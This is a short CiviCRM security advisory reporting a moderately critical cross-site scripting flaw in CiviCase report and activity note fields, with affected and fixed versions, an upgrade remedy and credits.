CIVI-SA-2020-04: Cross Site Scripting within CiviCase Reports

Publicat
2020-04-15 12:00
Written by

CiviCRM did not properly purify the content of the note fields attached to CiviCase activities when generating Case Reports or viewing the Case Activity

Security Risk
Moderately Critical
Vulnerability
Cross Site Scripting
Affected Versions

CiviCRM version 5.24.2 and earlier

Fixed Versions

CiviCRM version 5.24.3 & 5.21.3

Publication Date
Solutions

Upgrade to the latest CivICRM version

Credits

Patrick Figel (Greenpeace CEE) for reporting the issue
Seamus Lee (JMA Consulting/CiviCRM) and Patrick Figel (Greenpeace CEE) for resolving the issue

References

security/core#40